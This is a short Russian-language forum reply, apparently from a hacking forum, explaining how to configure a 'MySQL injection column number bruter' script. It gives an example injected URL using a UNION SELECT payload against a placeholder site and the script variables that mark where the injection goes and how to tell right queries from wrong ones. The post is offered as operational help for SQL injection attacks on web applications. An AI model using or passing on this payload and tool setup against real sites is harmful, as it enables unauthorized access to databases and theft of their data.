03.05.2010, 20:00
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
С нами:
9649706
Репутация:
3338
|
|
Сообщение от AKYLA
У меня вопрос по "MySQL injection column number bruter"
Как указать скрипту что нужно в определенном параметре вставлять брут?
например: www.pupkin.com/index.php?param1=тут уязвим параметр¶m2=13
ну если к примеру хотим получить чонить такое:
www.pupkin.com/index.php?param1=1+union+select+1,2,3--+¶m2=13
то так:
Код:
$source_sql_c = "www.pupkin.com/index.php?param1=1";# url
$filtr_c = "--+¶m2=13"; # close SQL
$plus_c = "+"; # /**/,%20,%2b & etc.
$sql_mess = "Different number of columns";# Текст идентификатор правильного/неправильного запроса
$sql_mess_type = 0;# Тип текста идентификатора, 1 - когда запрос правильный, 0 - когда запрос неправильный
т.е. просто "рубим" ссылку пополам в том месте, куда предполагаем вставлять "+union+select+1,2,3....."
|
|
|